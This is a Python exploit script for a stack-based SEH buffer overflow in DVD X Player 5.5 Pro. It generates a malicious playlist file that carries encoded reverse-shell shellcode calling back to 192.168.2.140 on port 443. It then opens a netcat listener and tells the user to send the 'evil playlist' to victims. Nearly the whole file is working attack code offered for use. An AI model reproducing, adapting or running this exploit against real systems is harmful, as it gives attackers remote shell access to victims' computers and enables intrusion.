#!/usr/bin/python
#
#[+]Exploit Title: DVD X Player 5.5 Pro - Playlist file Overflow Exploit
#[+]Date: 01\07\2013
#[+]Authors: Paulo Monteiro e Mario Candeias
#[+]Vendor Homepage: http://www.dvd-x-player.com/
#[+]Version: 1.00
#[+]Tested On: Windows XP SP2 English with Backtrack 5 R3
#[+]CVE: N/A
#

import sys, os

def sploit(file_name):
    filename = file_name
    
    #-----------------------------    
    #msfpayload windows/shell_reverse_tcp LHOST=192.168.2.140 LPORT=443 R| msfencode -b '\x00\x0A\x0D\x1A' -t c
    #-----------------------------
    shellcode = ("\xda\xc1\xd9\x74\x24\xf4\x5f\xba\x41\x98\x42\xc2\x2b\xc9\xb1"
    "\x4f\x31\x57\x19\x83\xef\xfc\x03\x57\x15\xa3\x6d\xbe\x2a\xaa"
    "\x8e\x3f\xab\xcc\x07\xda\x9a\xde\x7c\xae\x8f\xee\xf7\xe2\x23"
    "\x85\x5a\x17\xb7\xeb\x72\x18\x70\x41\xa5\x17\x81\x64\x69\xfb"
    "\x41\xe7\x15\x06\x96\xc7\x24\xc9\xeb\x06\x60\x34\x03\x5a\x39"
    "\x32\xb6\x4a\x4e\x06\x0b\x6b\x80\x0c\x33\x13\xa5\xd3\xc0\xa9"
    "\xa4\x03\x78\xa6\xef\xbb\xf2\xe0\xcf\xba\xd7\xf3\x2c\xf4\x5c"
    "\xc7\xc7\x07\xb5\x16\x27\x36\xf9\xf4\x16\xf6\xf4\x05\x5e\x31"
    "\xe7\x70\x94\x41\x9a\x82\x6f\x3b\x40\x07\x72\x9b\x03\xbf\x56"
    "\x1d\xc7\x59\x1c\x11\xac\x2e\x7a\x36\x33\xe3\xf0\x42\xb8\x02"
    "\xd7\xc2\xfa\x20\xf3\x8f\x59\x49\xa2\x75\x0f\x76\xb4\xd2\xf0"
    "\xd2\xbe\xf1\xe5\x64\x9d\x9d\xca\x5a\x1e\x5e\x45\xed\x6d\x6c"
    "\xca\x45\xfa\xdc\x83\x43\xfd\x23\xbe\x33\x91\xdd\x41\x43\xbb"
    "\x19\x15\x13\xd3\x88\x16\xf8\x23\x34\xc3\xae\x73\x9a\xbc\x0e"
    "\x24\x5a\x6d\xe6\x2e\x55\x52\x16\x51\xbf\xe5\x11\xc6\x80\x5e"
    "\x9f\x9b\x69\x9d\x9f\xa2\xd2\x28\x79\xce\x34\x7d\xd2\x67\xac"
    "\x24\xa8\x16\x31\xf3\x38\xba\xa0\x98\xb8\xb5\xd8\x36\xef\x92"
    "\x2f\x4f\x65\x0f\x09\xf9\x9b\xd2\xcf\xc2\x1f\x09\x2c\xcc\x9e"
    "\xdc\x08\xea\xb0\x18\x90\xb6\xe4\xf4\xc7\x60\x52\xb3\xb1\xc2"
    "\x0c\x6d\x6d\x8d\xd8\xe8\x5d\x0e\x9e\xf4\x8b\xf8\x7e\x44\x62"
    "\xbd\x81\x69\xe2\x49\xfa\x97\x92\xb6\xd1\x13\xa2\xfc\x7b\x35"
    "\x2b\x59\xee\x07\x36\x5a\xc5\x44\x4f\xd9\xef\x34\xb4\xc1\x9a"
    "\x31\xf0\x45\x77\x48\x69\x20\x77\xff\x8a\x61")

    evil = "\x90"*20 + shellcode

    #-----------------------------------------
    #buffer = "\x41"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "\x42" * (1384-len(evil))
    #buffer = "A"*608 + [nSEH - EB 06] + [SEH - 0x61617619] + "D"*1384
    #buffer = "A"*608 + [nSEH - EB 06] + [SEH - 0x61603173] + "D"*1384
    #-----------------------------------------
    buffer = "\x41"*608 + "\xEB\x06\x90\x90" + "\x73\x31\x60\x61" + evil + "\x42" * (1384-len(evil))
    #create exploit file
    try:    
        print "Creating Evil Playlist ["+file_name+"]...\n"
        textfile = open(filename, 'w')
        textfile.write(buffer)
        textfile.close()
        #open listener shell on port 443
        print "[-] You can now send the evil playlist to your(s) victim(s)!\n"
        print "[-] Waiting victim connection...\n"
        os.system("nc -lvp 443")

    except:
        print "Error creating file...\n"
 
if __name__ == '__main__':       
    if (len(sys.argv) < 2):
        print "\nUsage: dvdxpro_final.py <filename.plf> \n"
        sys.exit()
    else:
        file_name = sys.argv[1]
        sploit(file_name)
